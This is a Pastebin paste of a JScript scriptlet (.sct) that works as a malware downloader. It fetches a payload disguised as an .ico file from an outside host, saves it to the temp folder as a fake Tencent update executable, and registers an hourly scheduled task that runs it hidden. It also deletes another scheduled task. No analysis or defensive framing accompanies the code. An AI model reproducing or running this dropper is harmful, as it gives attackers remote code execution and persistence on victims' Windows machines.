Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?XML version="1.0"?>
- <scriptlet>
- <registration
- description="Bandit"
- progid="Bandit"
- version="1.00"
- classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
- remotable="true"
- >
- </registration>
- <script language="JScript">
- <![CDATA[
- var WSHShell = new ActiveXObject("WScript.Shell");
- path = WSHShell.ExpandEnvironmentStrings("%temp%");
- var filepath = path+"/tencent-update-check.exe";
- var xhr = new ActiveXObject("MSXML2.XMLHTTP");
- xhr.open("GET","https://valtn.me/tmp-files/dl/9f3180daecb8946de47cb152f24ed47a/50c6c8fe.ico", false);
- xhr.send();
- if (xhr.Status == 200) {
- var fso = new ActiveXObject("Scripting.FileSystemObject");
- var stream = new ActiveXObject("ADODB.Stream");
- stream.Open();
- stream.Type = 1;
- stream.Write(xhr.ResponseBody);
- stream.Position = 0;
- if (fso.FileExists(filepath)){
- fso.DeleteFile(filepath);
- }
- stream.SaveToFile(filepath);
- stream.Close();
- var kabasky = new ActiveXObject("WScript.Shell").Run('schtasks /Create /SC hourly /TN Tencent-Update-Check /TR "%temp%/tencent-update-check.exe" /ST 00:56:00',0, true);
- var zhudongfangyu = new ActiveXObject("WScript.Shell").Run('schtasks /Delete /TN Windows-WorkStatin-Job /F',0, true);
- }
- ]]>
- </script>
- </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement